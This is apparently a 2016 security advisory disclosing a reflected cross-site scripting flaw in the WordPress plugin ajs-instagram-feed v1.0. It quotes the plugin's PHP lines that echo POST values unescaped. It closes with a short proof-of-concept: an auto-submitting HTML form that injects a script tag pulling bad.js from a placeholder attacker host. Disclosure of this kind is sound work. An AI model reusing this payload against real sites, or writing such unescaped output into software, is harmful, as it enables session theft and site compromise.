Advisory #: 1129
Title: Reflected XSS in wordpress plugin ajs-instagram-feed v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/ajs-instagram-feed
Downloads: 836
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: ajs-instagram-feed
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./ajs-instagram-feed/admin/partials/ajs-instagram-feed.php: 91: <input type="text" name="ajs_access_token" id="ajs_access_token" value="<?php echo $_POST['ajs_access_token']; ?>" size="60" /> 96: <td><input type="text" name="ajs_user_id" id="ajs_user_id" value="<?php echo $_POST['ajs_user_id']; ?>" size="20" /> <span class="ajs-help-text"><?php _e('To display photos from other peoples Instagram accounts, you can use <a href="http://www.otzberg.net/iguserid/" target="_blank">this tool</a> to find their User ID.', 'ajs-instagram-feed'); ?></span></td> 98: </table> <input type="hidden" name="ajs_show_username" value="<?php echo $_POST['ajs_show_username']?>" /> 99: <input type="hidden" name="ajs_show_follow_btn" value="<?php echo $_POST['ajs_show_follow_btn']?>" /> 116: <td><input type="text" name="ajs_count" id="ajs_count" value="<?php echo $_POST['ajs_count']; ?>" size="17" /></td> 124: <td><input type="text" name="ajs_username_text_color" value="<?php echo $_POST['ajs_username_text_color']; ?>" class="ajs-color-field" data-default-color="#1c5380" /></td> 130: <tr> <th><label for="show_follow_btn"><?php _e('Show Follow Button', 'ajs-instagram-feed'); ?></label></th> <td><input type="checkbox" name="ajs_show_follow_btn" value="yes" <?php if ($_POST['ajs_show_follow_btn']=="yes") { echo 'checked="checked"';} ?> /></td> </tr> <tr> <th><label for="follow_btn_text_color"><?php _e('Text Color', 'ajs-instagram-feed'); ?></label></th> <td><input type="text" name="ajs_follow_btn_text_color" value="<?php echo $_POST['ajs_follow_btn_text_color']; ?>" class="ajs-color-field" data-default-color="#effeff" /></td> </tr> <tr> <th><label for="follow_btn_bg_color"><?php _e('Background Color', 'ajs-instagram-feed'); ?></label></th> <td><input type="text" name="ajs_follow_btn_bg_color" value="<?php echo $_POST['ajs_follow_btn_bg_color']; ?>" class="ajs-color-field" data-default-color="#effeff" /></td> </tr> <tr> <th><label for="follow_btn_text"><?php _e('Button Text', 'ajs-instagram-feed'); ?></label></th> <td><input type="text" name="ajs_follow_btn_text" id="ajs_follow_btn_text" value="<?php echo $_POST['ajs_follow_btn_text']; ?>" size="30" /></td> </tr> The variable ajs_access_token appears to send unsanitized data back to the users browser via POST request.
CVE-ID: Not Released
File:./ajs-instagram-feed/admin/partials/ajs-instagram-feed.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
  3.  <form name=TheForm action=http://[target]/wp-content/plugins/ajs-instagram-feed/admin/partials/ajs-instagram-feed.php method=post> <input type=hidden name=ajs_access_token value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;> </form> <script> document.TheForm.submit(); </script>